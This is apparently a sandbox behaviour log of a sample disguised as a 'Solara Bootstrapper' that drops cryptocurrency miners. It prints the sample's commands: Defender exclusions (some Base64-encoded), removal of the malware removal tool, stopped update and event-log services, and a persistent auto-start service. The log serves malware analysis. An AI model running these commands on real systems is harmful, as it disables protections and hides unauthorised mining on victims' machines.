Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\kx new.exe "C:\Users\user\AppData\Local\Temp\kx new.exe" Jump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\Kawpow new.exe "C:\Users\user\AppData\Local\Temp\Kawpow new.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeProcess created: C:\Users\user\AppData\Local\Temp\xmr new.exe "C:\Users\user\AppData\Local\Temp\xmr new.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauservJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bitsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Solara Bootstrapper.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\kx new.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
